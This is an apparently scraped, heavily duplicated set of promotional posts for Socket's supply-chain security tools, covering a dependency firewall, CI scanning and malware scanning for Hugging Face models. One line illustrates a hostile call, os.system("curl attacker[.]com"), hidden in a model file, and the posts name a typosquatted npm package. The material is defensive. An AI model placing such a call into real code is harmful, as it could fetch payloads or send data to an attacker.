sfw npm install lodahs <-- blocked as malware
Full episode here 👇
www.youtube.com/watch?v=fLtM...
sfw npm install lodahs <-- blocked as malware
Full episode here 👇
www.youtube.com/watch?v=fLtM...
• And yes… add a firewall for your dependencies
If you haven't heard about Socket Firewall. It’s free. It works with npm, PyPI, and Cargo. And it blocks malicious packages before they hit your machine. No config. No API keys. Just install and go ⚡️
• And yes… add a firewall for your dependencies
If you haven't heard about Socket Firewall. It’s free. It works with npm, PyPI, and Cargo. And it blocks malicious packages before they hit your machine. No config. No API keys. Just install and go ⚡️
The idea is simple: every package download should be verified and governed by your rules, in real time. That’s what Socket Firewall does.
The idea is simple: every package download should be verified and governed by your rules, in real time. That’s what Socket Firewall does.
If your team uses GitHub Actions, install Socket — it takes literally 2 clicks — and turn on GitHub Actions scanning today.
If your team uses GitHub Actions, install Socket — it takes literally 2 clicks — and turn on GitHub Actions scanning today.
That’s a huge blind spot in your CI/CD pipeline.
That’s a huge blind spot in your CI/CD pipeline.
All unified under one consistent policy + results format. Because you shouldn’t need 6 scanners to ship safe code.
🚀 Try it today: socket.dev/blog/socket-...
All unified under one consistent policy + results format. Because you shouldn’t need 6 scanners to ship safe code.
🚀 Try it today: socket.dev/blog/socket-...
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
This is just the start.
We’re extending Socket to protect the full Hugging Face ecosystem — models, datasets, and Spaces.
The AI supply chain should be as safe and auditable as traditional software.
👉 Try it here: socket.dev/blog/announcing-experimental-malware-scanning-for-hugging-face
This is just the start.
We’re extending Socket to protect the full Hugging Face ecosystem — models, datasets, and Spaces.
The AI supply chain should be as safe and auditable as traditional software.
👉 Try it here: socket.dev/blog/announcing-experimental-malware-scanning-for-hugging-face
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️